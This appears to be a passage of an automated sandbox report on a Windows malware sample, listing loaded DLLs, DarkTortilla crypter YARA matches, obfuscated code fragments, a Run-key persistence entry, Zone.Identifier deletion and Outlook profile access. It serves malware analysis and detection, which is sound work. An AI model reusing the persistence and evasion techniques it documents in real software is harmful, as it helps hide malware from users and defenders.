Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: acgenral.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: samcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msacm32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dwmapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmmbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\File.com.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\File.com.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: File.com.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: File.com.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: File.com.exe

Static file information: File size 2387968 > 1048576

Source: File.com.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x245a00

Source: File.com.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

Yara detected DarkTortilla Crypter

Source: Yara match	File source: 18.2.xxlooa.exe.414a812.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.449537a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.4117852.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.41b0772.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.43c948a.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.4117852.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3cc6962.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3c2da42.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.442f41a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.414a812.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3bfaa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.442f41a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.41b0772.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3c60a02.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.43c948a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3bfaa72.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3c2da42.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.43fc45a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.43fc45a.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.40e4882.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.xxlooa.exe.40e4882.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3c60a02.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.5ce0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3eaecf0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.5ce0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.449537a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.xxlooa.exe.44c8330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3eaecf0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3cf9918.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.File.com.exe.3cc6962.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.2709059333.0000000002806000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839360978.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2721219524.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2721219524.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1837377657.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1847264743.0000000005CE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2563514752.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2574650182.0000000004396000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2574650182.0000000004495000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1839360978.0000000003CC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: File.com.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xxlooa.exe PID: 916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xxlooa.exe PID: 7252, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 19_2_00413B7E LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

19_2_00413B7E

Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_05525498 push 5D02AD56h; ret	0_2_05525490
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0734F78A push eax; retf	0_2_0734F791
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_0734DE28 push eax; ret	0_2_0734E831
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C191C1 pushad ; ret	0_2_07C191D3
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C17DCD push eax; ret	0_2_07C17ED6
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C32771 pushad ; retf	0_2_07C32772
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C32649 push esp; retf	0_2_07C3264A
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C3BA2C push dword ptr [edx+ebp*2-75h]; iretd	0_2_07C3BA37
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C3923D push ebx; retf	0_2_07C392FA
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C3253B push eax; retf	0_2_07C3253C
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C390F5 push eax; retf	0_2_07C39235
Source: C:\Users\user\Desktop\File.com.exe	Code function: 0_2_07C3386B push ebx; ret	0_2_07C33871
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_04AE2F88 push ss; retf	16_2_04AE2F8B
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_0879F68C push eax; retf	16_2_0879F691
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F391C1 pushad ; ret	16_2_09F391D3
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09F37DCD push eax; ret	16_2_09F37ED6
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FB2573 push ebx; ret	16_2_09FB2579
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 16_2_09FB7FB0 push dword ptr [ebp+08h]; ret	16_2_09FB7FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0040BB97 push dword ptr [ecx-75h]; iretd	17_2_0040BBA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 17_2_0108E558 push eax; iretd	17_2_0108E559
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_02632FCD push dword ptr [ecx+ecx-75h]; iretd	18_2_02632FDA
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_027D9830 pushfd ; retf	18_2_027D9932
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_027D4797 push edx; retf	18_2_027D47AA
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_027D4BF1 pushad ; retf	18_2_027D4BF2
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AEA9C4 push eax; ret	18_2_05AEE7F1
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_05AEF74A push eax; retf	18_2_05AEF751
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_0861F333 push 00000059h; ret	18_2_0861F336
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09B27DCD push eax; ret	18_2_09B27ED6
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Code function: 18_2_09BA2573 push ebx; ret	18_2_09BA2579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 19_2_0260E558 push eax; iretd	19_2_0260E559

Source: File.com.exe, p3ZB.cs	High entropy of concatenated method names: 'd6HA', 'Dd9z', 'Ws0m', 'i7WM', 'Xt3s', 'w9LX', 'Fc2m', 'Bq8f', 'Gz5a', 'Rz1m'
Source: xxlooa.exe.5.dr, p3ZB.cs	High entropy of concatenated method names: 'd6HA', 'Dd9z', 'Ws0m', 'i7WM', 'Xt3s', 'w9LX', 'Fc2m', 'Bq8f', 'Gz5a', 'Rz1m'

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\xxlooa.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xxlooa			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xxlooa			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\File.com.exe	File opened: C:\Users\user\Desktop\File.com.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	File opened: C:\Users\user\AppData\Roaming\xxlooa.exe\:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	File opened: C:\Users\user\AppData\Roaming\xxlooa.exe\:Zone.Identifier read attributes \| delete

Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xxlooa.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
